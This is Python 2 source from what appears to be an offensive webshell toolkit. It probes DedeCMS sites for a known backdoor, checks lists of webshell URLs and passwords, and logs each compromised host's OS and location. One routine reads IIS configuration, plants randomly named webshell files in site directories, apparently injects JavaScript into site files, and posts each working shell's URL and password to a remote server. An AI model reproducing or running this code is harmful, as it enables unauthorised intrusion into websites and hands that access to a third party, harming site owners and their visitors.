def find(self, arg):
site = '/plus/dst.php'
heareds = {
"User-Agent":
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
}
conn = httplib.HTTPConnection(arg)
try:
conn.request('GET', site, None, heareds)
httpres = conn.getresponse()
if httpres.status == 200:
data = 'http://%s/plus/dst.php' % arg
if yijuhua.yijuhua_cs("php", data,
"cmd"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
self.url, "exp", "exp_dedecms_yijuhua", data, "cmd",
"webshell"
]
##["网址","漏洞类型","漏洞详细信息","漏洞地址","密码","备注"]
#print EXP_list
Class_Queue.exp_url.put(EXP_list, 0.5) #插入队列
except Exception, e:
#print e
return False
def yjh_cs_2(self): #测试一句话是否连接成功
global yu_2, yu_3
self.ui.main_pushButton_2.setEnabled(0) #给改成禁用
int_model = self.ui.SQLite_tableView.selectionModel() #获取选中编号
model = self.ui.SQLite_tableView.model(
) #index = model.index(3,1)#data = model.data(index)#print data.toString()
h = qqwry.C_hoset()
for index in int_model.selectedRows(): #// 对于被选中的每一行
try:
int_index = index.row() #获取行号
s0 = model.data(model.index(int_index, 0)).toString()
s1 = model.data(model.index(int_index, 1)).toString()
data_time2 = time.strftime('%Y-%m-%d %H:%M:%S',
time.localtime(time.time()))
data_time = time.mktime(
time.strptime(data_time2, '%Y-%m-%d %H:%M:%S')) #转化成时间戳
if s0 == "" or len(s0) <= 7:
yu_3 += 1 #失败多少条
self.tableView_add(int_index, None, None, u"null", None,
None, None, None, None, None,
data_time2) #添加数据
sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
data_time, str(s0), str(s1))
self.sql3.mysqlite3_update(sql_data)
continue #跳过
# url="http://www.sttc.cn/uploadfile/2013/0621/thumb_6_6_.Php.JPG%20%20%20%20%20%20%20Php"
# PASS="******"
if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
yu_2 += 1 #成功多少条
#self.tableView_add(int_index,None,None,u"ok",None,None,None,data_time) #添加数据
#sql_data="update shell set zts3='ok',time2s7='%s' where urls1='%s' and passwods2='%s'"%(data_time,str(s0),str(s1))
#yijuhua_win_linux(url,PASS): #URL地址 ,密码 返回操作系统
win_linux = yijuhua.yijuhua_win_linux(
str(s0), str(s1)) #URL地址 ,密码 返回操作系统
WLWZ = h.www_data(qqwry.url_www(str(s0)))
WLWZ = u"%s" % (WLWZ)
if g.bool_asp_php(str(s0)) == "asp":
win_linux = "WinNT"
self.tableView_add(int_index, None, None, u"ok",
str(win_linux), None, None, None, WLWZ,
None, data_time2) #添加数据
sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
str(win_linux), WLWZ, data_time, str(s0), str(s1))
else:
yu_3 += 1 #失败多少条
self.tableView_add(int_index, None, None, u"No", u"No",
None, None, None, None, None,
data_time2) #添加数据
sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
data_time, str(s0), str(s1))
self.sql3.mysqlite3_update(sql_data)
except BaseException, e:
print(str(e))
self.ui.main_pushButton_2.setEnabled(1)
return 0
def db_cs(self, ID): #测试还没有测试过的一句话
try:
global yu_1, yu_2, yu_3
sql_data = ""
if ID == 0:
sql_data = "select * from shell where zts3 is null"
if ID == 1:
sql_data = "select * from shell where zts3='ok'"
if ID == 2:
sql_data = "select * from shell where zts3='No'"
self.sql3.conn.commit() # 获取到游标对象
cur = self.sql3.conn.cursor() # 用游标来查询就可以获取到结果
cur.execute(sql_data) # 获取所有结果
res = cur.fetchall() #从结果中取出所有记录
for line in res:
s0 = str(line[0])
s1 = str(line[1])
data_time2 = time.strftime('%Y-%m-%d %H:%M:%S',
time.localtime(time.time()))
data_time = time.mktime(
time.strptime(data_time2, '%Y-%m-%d %H:%M:%S')) #转化成时间戳
if s0 == "" or len(s0) <= 7:
yu_3 += 1 #失败多少条
sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
data_time, str(s0), str(s1))
self.sql3.mysqlite3_update(sql_data)
continue #跳过
if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
yu_2 += 1 #成功多少条
win_linux = yijuhua.yijuhua_win_linux(
str(s0), str(s1)) #URL地址 ,密码 返回操作系统
WLWZ = self.h.www_data(qqwry.url_www(str(s0)))
WLWZ = u"%s" % (WLWZ)
if g.bool_asp_php(str(s0)) == "asp":
win_linux = "WinNT"
sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
str(win_linux), WLWZ, data_time, str(s0), str(s1))
self.br_pr_sogo(s0, s1) #获取 百度 谷歌 搜狗 权重
print u"URL:%s--passwod:%s-----ok-----%s" % (str(s0),
str(s1), WLWZ)
self.messagebox()
else:
yu_3 += 1 #失败多少条
sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
data_time, str(s0), str(s1))
self.messagebox()
print u"URL:%s--passwod:%s-----No" % (str(s0), str(s1))
self.sql3.mysqlite3_update(sql_data)
except BaseException, e:
print(str(e))
return 0
def scan(self, url):
self.look_add_file() #添加数据
for i in self.list: #
ss = i.split("|")
if len(ss) >= 2:
url2 = url + ss[0]
if yijuhua.yijuhua_cs(self.bool_asp_php(url2), url2,
str(ss[1])): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
self.url, "exp", "exp_eval", url2,
str(ss[1]), "webshell"
]
##["网址","漏洞类型","漏洞详细信息","漏洞地址","密码","备注"]
#print EXP_list
Class_Queue.exp_url.put(EXP_list, 0.5) #插入队列
def br_pr_sogo_4(self): #查询\WEBSHELL 状态
self.ui.pb_pushButton_1.setEnabled(0) #给改成禁用
int_model = self.ui.tableView.selectionModel() #获取选中编号
model = self.ui.tableView.model(
) #index = model.index(3,1)#data = model.data(index)#print data.toString()
for index in int_model.selectedRows(): #// 对于被选中的每一行
try:
int_index = index.row() #获取行号
s0 = model.data(model.index(int_index, 0)).toString()
s1 = model.data(model.index(int_index, 1)).toString()
if s0 == "" or len(s0) <= 7:
self.tableView_add(int_index, None, None,
u"null") #添加数据urllib.quote(str(s0))
sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % (
str(s0), str(s1))
self.sql3.mysqlite3_update(sql_data)
continue #跳过
#print str(s0)
if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
win_linux = "WinNT"
if g.bool_asp_php(s0) == "php":
win_linux = yijuhua.yijuhua_win_linux(str(s0), str(s1))
www_wlwz = yijuhua.www_wlwz(str(s0))
self.tableView_add(int_index, None, None, u"ok",
str(win_linux), None, None,
www_wlwz) #添加数据urllib.quote(str(s0))
sql_data = "update url set zt='ok',win='%s',wl='%s' where url='%s' and passwod='%s'" % (
str(win_linux), urllib.quote(
str(www_wlwz)), str(s0), str(s1))
else:
self.tableView_add(int_index, None, None,
u"No") #添加数据urllib.quote(str(s0))
sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % (
str(s0), str(s1))
#print sql_data
self.sql3.mysqlite3_update(sql_data)
except BaseException, e:
pass
def br_pr_sogo_4(self): #查询\WEBSHELL 状态
self.ui.pushButton_4.setEnabled(0) #给改成禁用
int_model = self.ui.tableView.selectionModel() #获取选中编号
model = self.ui.tableView.model(
) #index = model.index(3,1)#data = model.data(index)#print data.toString()
for index in int_model.selectedRows(): #// 对于被选中的每一行
try:
int_index = index.row() #获取行号
s0 = model.data(model.index(int_index, 0)).toString()
s1 = model.data(model.index(int_index, 1)).toString()
if s0 == "" or len(s0) <= 7:
self.tableView_add(int_index, None, None,
u"null") #添加数据urllib.quote(str(s0))
sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % (
str(s0), str(s1))
self.sql3.mysqlite3_update(sql_data)
continue #跳过
#print str(s0)
if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
#self.tableView_add(int_index,None,None,u"ok",None,None,None,data_time) #添加数据
#sql_data="update shell set zts3='ok',time2s7='%s' where urls1='%s' and passwods2='%s'"%(data_time,str(s0),str(s1))
#yijuhua_win_linux(url,PASS): #URL地址 ,密码 返回操作系统
self.tableView_add(int_index, None, None,
u"ok") #添加数据urllib.quote(str(s0))
sql_data = "update url set zt='ok' where url='%s' and passwod='%s'" % (
str(s0), str(s1))
else:
self.tableView_add(int_index, None, None,
u"No") #添加数据urllib.quote(str(s0))
sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % (
str(s0), str(s1))
#print sql_data
self.sql3.mysqlite3_update(sql_data)
except BaseException, e:
pass
def IIS_xml():
data = open_file()
if data == 0:
print u"Cannot find the file path in the C IIsWebServerfile" #无法找到IIS配置文件
return 0
p1 = re.compile(r'<IIsWebVirtualDir(.+?)</IIsWebServer>')
data1 = data.replace("\n", '') #去除换行符好匹配
IISWEB = p1.findall(data1) #网站路径
for every1 in IISWEB: #网站路径
try:
p2 = re.compile(r'ServerBindings="(.+?)"')
data2 = p2.findall(every1) #网站域名
if len(data2) < 1:
continue #跳过 这一次
p3 = re.compile(r'Path="(.+?)"')
data3 = p3.findall(every1) #网站路径
if len(data3) < 1:
continue #跳过 这一次
download_Path = TQ_Path(data3[0]) #网站路径
data_list = list_file(download_Path) #遍历文件
if len(data_list) >= 1:
data_url2 = "%s%s.%s" % (
data_list[sjs_random(0, len(data_list))], sj_az_AZ(8),
ASP_PHP) #传马目录 D:\wamp\www\CPM\Index\Lib\Action\
else:
continue #跳过 这一次
www_bool = False #True
for www_url in http_www_url(data2[0]):
print "www:%s" % (www_url) #网址 http://localhost/
print "download_Path:%s" % (download_Path) #主目录 D:\wamp\www
print "download_Path eval:%s" % (
data_url2
) #文件路径 D:\wamp\www\mythink\.svn\pristine\4b\vuZelUL.php
www_url2 = "%s%s" % (
www_url, download_bz(download_Path, data_url2).replace(
"\\", '/')
) #编辑路径 http://localhost/mythink/.svn/pristine/4b/vuZelUL.php
print "www_Path:%s" % (www_url2) #网址 http://localhost/
path_file(data_url2, argv1) #写入文件 路径 文件
if yijuhua.yijuhua_cs(ASP_PHP, str(www_url2), str(argv2)):
www_bool = True
data = "%s|%s" % (str(www_url2), str(argv2))
TXT_file2("webshell--OK.txt", data)
print "file:%s" % (data_url2)
print "url:%s password:%s--OK" % (str(www_url2),
str(argv2))
if not argv3 == "":
data_url = "%s?url=%s&passwod=%s" % (
str(argv3), str(www_url2), str(argv2))
yijuhua.Aurl_post(data_url) #远程提交到后台
print "post %s" % (data_url)
else:
data = "%s|%s" % (str(www_url2), str(argv2))
TXT_file2("webshell--NO.txt", data)
print "file:%s" % (data_url2)
print "url:%s password:%s--NO" % (str(www_url2),
str(argv2))
print "----------------------------------------"
list_file_js(download_Path) #遍历路径 挂载JS
if www_bool == False:
if os.path.isfile(data_url2): #查看文件是否存在
os.remove(data_url2) #删除文件
print "delete %s" % (data_url2)
except BaseException, e:
#print(str(e))
return 0